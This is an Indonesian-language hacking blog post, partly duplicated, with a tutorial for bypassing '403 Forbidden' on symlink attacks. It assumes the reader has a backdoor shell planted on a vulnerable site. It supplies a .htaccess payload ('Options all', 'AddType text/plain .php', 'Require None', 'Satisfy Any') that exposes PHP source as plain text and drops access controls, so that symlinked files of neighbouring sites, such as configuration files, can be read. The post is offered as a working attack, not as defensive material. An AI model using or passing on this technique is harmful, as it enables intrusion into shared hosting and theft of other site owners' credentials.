Oke Kali ini saya akan post tutorial Bypass Symlink Forbidden 403 . Mungkin para mastah sudah mengetahuinya :) Oke cekidot
tidak ada beda nya dengan sebelum nya internal server error yang mungkin bikin kalian kesal karena tidak bisa Symlink :v oke sabar aja gan disini saya akan memberi tutorial singkat bypass nya :v
Untuk cara bypass bisa dibilang cukup mudah bahkan agak sulit juga :v
Bahan-bahan :
1. Shell backdoor yang tertanam di web yang mau di symlink
2. Web yang mau disymlink vuln/bisa
3.Kopi udud jan lupa gan :v
Prof of Concept :
1. Masuk ke folder/dir symlink kalian
2. Buat new file/file baru buat .htaccess di dalam folder yang dibuat tadi.
nb : *ingat ya htaccess pake . (titik) di depan nama htaccess jadi .htaccess
3. Isi .htaccess dengan kode berikut
4. Save file tersebut dan lihat hasilnya
Oke gan dah bisa tinggal di anuin :v
NB :
Tidak semua work 100% , tergantung server pased/Php versinya
Untuk cara bypass bisa dibilang cukup mudah bahkan agak sulit juga :v
Bahan-bahan :
1. Shell backdoor yang tertanam di web yang mau di symlink
2. Web yang mau disymlink vuln/bisa
3.Kopi udud jan lupa gan :v
Prof of Concept :
1. Masuk ke folder/dir symlink kalian
2. Buat new file/file baru buat .htaccess di dalam folder yang dibuat tadi.
nb : *ingat ya htaccess pake . (titik) di depan nama htaccess jadi .htaccess
3. Isi .htaccess dengan kode berikut
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any4. Save file tersebut dan lihat hasilnya
Oke gan dah bisa tinggal di anuin :v
NB :
Tidak semua work 100% , tergantung server pased/Php versinya
Sekian tutor kali ini semoga bermanfaat :*
Hello, my name is Jack Sparrow. I'm a 50 year old self-employed Pirate from the Caribbean.
No comments:
Post a Comment